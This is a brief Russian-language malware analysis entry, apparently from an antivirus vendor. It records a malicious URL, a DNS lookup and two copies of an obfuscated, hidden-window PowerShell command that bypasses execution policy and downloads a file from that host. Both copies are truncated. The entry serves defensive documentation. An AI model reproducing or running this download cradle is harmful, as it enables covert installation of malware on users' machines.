Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^W^E^RS^h^ElL^.E^xE^ ^-^ExEcutiO^Npo^lIc^Y bYpas^s ^-NOPR^O^Fi^l^E -w^IND^OwstyLe hID^dEn (^NEw-OBJ^ec^T^ sys^te^m^.N^et.W^e^bclIeNT)^.Downl^OAD^F^I^LE('http://transporingsytw.wa...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "Po^W^E^RS^h^ElL^.E^xE^ ^-^ExEcutiO^Npo^lIc^Y bYpas^s ^-NOPR^O^Fi^l^E -w^IND^OwstyLe hID^dEn (^NEw-OBJ^ec^T^ sys^te^m^.N^et.W^e^bclIeNT)^.Downl^OAD^F^I^LE('http://transporingsytw.wa...' (со скрытым окном)